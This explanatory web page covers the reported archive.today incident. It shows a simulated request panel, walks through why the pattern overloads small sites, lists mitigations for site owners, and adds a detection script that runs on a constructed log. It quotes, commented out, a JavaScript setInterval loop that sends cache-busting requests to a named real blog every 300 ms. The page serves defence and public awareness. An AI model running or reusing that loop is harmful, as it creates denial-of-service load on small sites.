Inside the archive.today Incident — Simulation, Evidence & What Site Owners Should Do

Inside the archive.today Incident — Simulation & Technical Walkthrough

A step-by-step visualization of the reported JavaScript pattern, why it can create DDoS-level load on small sites, and what was discussed in public sources. Claims are presented as reported/alleged and attributed below.

Simulation of Repeated Request Attack
This visual demo shows the request pattern reported in community sources. NO network requests are performed by this page.
[Interactive simulation panel: interval 300 ms; requests/sec 3.33; total requests 47; open pages (sim) 1. In the visual stream, each dot is one simulated request. Lowering the interval slider raises the request volume.]
Simulated request log
[Simulated log — safe visual output only]
// Observed pattern (for explanation only — do NOT run):
// setInterval(function() {
//   fetch("https://gyrovague.com/?s=" + Math.random().toString(36).substring(2), { referrerPolicy:"no-referrer", mode:"no-cors" });
// }, 300);

Step-by-Step: How the Reported Code Produces DDoS-Style Load

  1. Timer starts: The code uses setInterval(), which runs a callback repeatedly on the client while the page is open.
  2. Each tick builds a unique request: The snippet appends a randomized query (e.g. ?s=abc123) so responses aren't cached by browsers or CDNs.
  3. Requests continue while the tab remains open: A single visitor who leaves the tab open effectively becomes a sustained request source.
  4. Many visitors = many concurrent request streams: If many people open the archive CAPTCHA page, the number of generated requests multiplies.
  5. Small servers suffer: Personal blogs and low-tier hosting can be overwhelmed by sustained CPU/database/bandwidth demands — functionally causing outages similar to DDoS attacks.

Reminder: The code pattern above and the impacts described are what community researchers and the original investigation observed and reported. This article attributes those claims to the sources listed below; it does not assert intent or criminal guilt.

Context: Why People Are Alarmed

archive.today (a widely used web-archiving site) is prominent and used by researchers, journalists, and the public. The fact that the reported code runs on its CAPTCHA page — and that the requests target external blogs — raised alarm in multiple communities (Hacker News, Reddit, Lobsters).

Publicly shared correspondence (linked below) contains allegations about the operator's conduct. These allegations include threatening or coercive messages published in a chat log; they are presented here as reports made public via that correspondence and community threads.

Important: individual-level claims are sensitive. Reporting here sticks to "according to public sources" phrasing and provides links so readers can evaluate the documents themselves.

Video Walkthroughs & Demonstrations

Community members recorded walkthroughs that show the script and behavior—these are embedded for convenience.

Primary Sources & Public Threads (read them yourself)

These sources contain the code sample, screenshots, community analysis, and the published correspondence. Please read them directly for full context.

Recommended Mitigations for Site Owners

  • Rate-limit search endpoints and expensive queries (return 429/503 when under heavy load).
  • Cache common responses and treat very short random queries as low-cost cached hits.
  • Use CDN or WAF to detect and block repetitive client-side request patterns.
  • Monitor logs for repeated similar requests and save sample headers for abuse reporting.
  • Consider temporary blocking of the archive domain in server-side rules while investigating.
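
A log check for the "monitor logs for repeated similar requests" item, as an added example that is not part of the original article or its sources: it flags client IPs that send a steady run of unique, referrer-less ?s= values of the shape the reported snippet generates. The log layout (nginx-style with $time_iso8601), the thresholds, the function names and the sample data are assumptions constructed for illustration.

```javascript
// Added example (not from the article): flag clients whose search traffic
// matches the reported pattern. Log layout and thresholds are assumptions.
const LINE = /^(\S+) \[([^\]]+)\] "GET (\S+) [^"]*" (\d{3}) "([^"]*)"$/;
const TOKEN = /^[0-9a-z]{3,13}$/; // shape of Math.random().toString(36).substring(2)
function parseLine(line) {
  const m = LINE.exec(line);
  if (!m) return null;
  const s = new URLSearchParams(m[3].split("?")[1] || "").get("s");
  return { ip: m[1], ts: Date.parse(m[2]), referer: m[5] === "-" ? "" : m[5],
           token: s !== null && TOKEN.test(s) ? s : null };
}

function detectSearchFlood(lines, { windowMs = 10000, minHits = 20, minUniqueRatio = 0.9 } = {}) {
  const byIp = new Map();
  for (const e of lines.map(parseLine)) {
    // Keep only referrer-less searches whose query looks like a random token.
    if (!e || !e.token || e.referer || Number.isNaN(e.ts)) continue;
    if (!byIp.has(e.ip)) byIp.set(e.ip, []);
    byIp.get(e.ip).push(e);
  }
  const flagged = [];
  for (const [ip, events] of byIp) {
    events.sort((a, b) => a.ts - b.ts);
    let start = 0, worst = null;
    for (let end = 0; end < events.length; end++) {
      while (events[end].ts - events[start].ts > windowMs) start++; // slide the window
      const win = events.slice(start, end + 1);
      const unique = new Set(win.map((e) => e.token)).size;
      if (win.length >= minHits && unique / win.length >= minUniqueRatio &&
          (!worst || win.length > worst.hits)) worst = { ip, hits: win.length, unique };
    }
    if (worst) flagged.push(worst); // busiest matching window for this client
  }
  return flagged;
}

// Constructed sample log: one tab left open on the 300 ms timer, one tab
// closed after 3 s, and one human searcher arriving from a referring page.
function constructedLog() {
  const t0 = Date.parse("2000-01-01T00:00:00Z");
  const row = (ip, ms, q, ref) =>
    `${ip} [${new Date(t0 + ms).toISOString()}] "GET /?s=${q} HTTP/1.1" 200 "${ref}"`;
  const out = [];
  for (let i = 0; i < 40; i++) out.push(row("192.0.2.10", i * 300, (100000 + i * 7919).toString(36), "-"));
  for (let i = 0; i < 10; i++) out.push(row("192.0.2.11", i * 300, (500000 + i * 7919).toString(36), "-"));
  ["nginx", "threat+model", "nginx"].forEach((q, i) =>
    out.push(row("198.51.100.7", i * 20000, q, "https://example.org/")));
  return out;
}
console.log(detectSearchFlood(constructedLog()));
```

The flagged addresses are visitors' browsers, not the origin of the script, so the output is better suited to sizing rate limits and saving samples for abuse reports than to building a blocklist.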
